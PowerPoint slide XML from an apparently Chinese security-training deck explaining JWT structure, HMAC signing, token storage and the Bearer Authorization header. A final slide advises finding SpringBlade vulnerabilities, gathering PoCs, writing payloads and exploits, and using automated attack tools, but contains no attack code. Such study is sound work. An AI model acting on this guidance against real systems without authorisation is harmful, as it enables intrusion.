              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
              <a:ea typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
              <a:cs typeface="Alibaba PuHuiTi B" pitchFamily="18" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图形 1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68965" y="1743787"/>
            <a:ext cx="201682" cy="201682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="771024" y="2204962"/>
            <a:ext cx="6205728" cy="3967057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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-JWT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619125" y="1385570"/>
            <a:ext cx="9893300" cy="3405505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>JWT是一种用于双方之间传递安全信息的简洁的、URL安全的表述性声明规范。JWT作为一个开放的标准（RFC 7519），定义了一种简洁的，自包含的方法用于通信双方之间以Json对象的形式安全的传递信息。因为数字签名的存在，这些信息是可信的，JWT可以使用HMAC算法或者是RSA的公私秘钥对进行签名。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>简洁(Compact) </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以通过URL，POST参数或者在HTTP header发送，因为数据量小，传输速度也很快</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自包含(Self-contained) </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>负载中包含了所有用户所需要的信息，避免了多次查询数据库</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699770" y="4791075"/>
            <a:ext cx="7646670" cy="1103630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>官网：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>jwt.io</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-JWT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619125" y="1385570"/>
            <a:ext cx="11369040" cy="3405505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是一个很长的字符串，中间用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> .  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分隔成三部分，其三部分依次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为Header（头部）、Payload（负载）、Signature（签名）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Header.Payload.Signature</a:t>
            </a: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347345" y="3085465"/>
            <a:ext cx="5252085" cy="1362710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5599430" y="2705100"/>
            <a:ext cx="6411595" cy="280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-JWT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08280" y="1166495"/>
            <a:ext cx="11369040" cy="3405505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:t>Header（头部）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:t>是token的一部分，用来存放token的类型和使用的签名算法（如 HS256、RS256 等），</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"/>
              <a:t>该部分</a:t>
            </a:r>
            <a:r>
              <a:t>通常是使用Base64Url </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:t>编码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Payload（负载）：包含了信息，你可以存放任一种信息，比如用户信息，产品信息等，使用Base64Url 进行编码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Signature（签名）：包括了header，payload和密钥的混合体，密钥必须安全地保存储在服务端。（对于 HMAC（如 HS256），使用指定的哈希算法和密钥，计算头部和载荷的 Base64Url 编码拼接后加密）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>签名为了保证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>的完整性和真实性。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>HMACSHA256(</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>  base64UrlEncode(header) + "." +</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>  base64UrlEncode(payload),</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>  secret)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5810885" y="3099435"/>
            <a:ext cx="5591175" cy="3531870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="370205" y="4572000"/>
            <a:ext cx="5161915" cy="2187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-JWT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619125" y="1385570"/>
            <a:ext cx="11217275" cy="4862195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方式：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>客户端收到服务器返回的 JWT，可以储存在 Cookie 里面，也可以储存在 localStorage。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>此后，客户端每次与服务器通信，都要带上这个 JWT。你可以把它放在 Cookie 里面自动发送，但是这样不能跨域，所以更好的做法是放在 HTTP 请求的头信息Authorization字段里面，那么跨源资源共享(CORS)将不会成为问题，因为它不使用cookie。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求头格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> Authorization : Bearer  aaa.bbb.ccc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>那么有没有想过为什么会有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Bearer  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>呢？</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>直接用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> Authorization : aaa.bbb.ccc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>方式不行吗？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>首先要明白在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>W3C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP 1.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>规范中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Authorization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>定义的格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Authorization: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;type&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> &lt;authorization-parameters&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>那</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>有哪几种呢？分别代表什么意思</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>呢？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>常见的类型有：Basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用于 http-basic 认证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>；Bearer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>常见于 OAuth 和 JWT 授权</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>；Digest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MD5 哈希的 http-basic 认证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> ；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Bearer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RFC 6750</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文献：https://www.rfc-editor.org/rfc/rfc6750.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>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-JWT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210310"/>
            <a:ext cx="10295255" cy="5495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令牌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-JWT</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023620" y="1139190"/>
            <a:ext cx="8849995" cy="5427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学习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>方法</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41300" y="1214120"/>
            <a:ext cx="6458585" cy="5100320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>带着目的去学：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>学习某个框架到底是为了什么？比如查找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>springBlade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>个框架的漏洞借助靶场或者自己搭建并进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>POC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>信息搜集的途径：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对应框架的项目地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>比如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>springBlade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：https://github.com/chillzhuang/SpringBlade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>然后找到该项目对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>issues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等搜索引擎对关键字进行检索搜集：比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>springblade poc cve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>关键字。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>复现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>利用：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>找到对应漏洞点确定漏洞的版本后本地搭建环境进行关键点的回溯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码审计</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，最后验证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，验证后编写自己的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在查找网络上有没有自动攻击的工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>脚本，进行辅助</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>渗透。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6769100" y="1172210"/>
